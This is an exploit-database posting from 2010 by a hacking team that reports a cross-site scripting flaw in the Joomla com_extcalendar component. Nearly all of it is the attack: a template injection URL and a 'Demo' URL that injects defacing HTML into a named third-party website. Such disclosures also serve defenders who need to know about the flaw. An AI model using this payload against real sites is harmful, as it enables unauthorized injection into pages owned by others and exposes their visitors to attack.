id: 12296
date: 05/19/2010
title: Joomla Component com_extcalendar XSS Vulnerability
author: s4r4d0
cves: 

==================================================
Joomla Component com_extcalendar XSS Vulnerability
==================================================


[x] Joomla Component Extcalendar
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team; Fatal Error
[x] Bug: XSS on Component Extcalendar
[x] Example: http://www.site.com/index.php?option=com_extcalendar=[XSS]
[x] Demo:http://www.ctsalsa.com/cms/index.php?option=com_extcalendar=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil



#  0day.today [2023-03-22]  #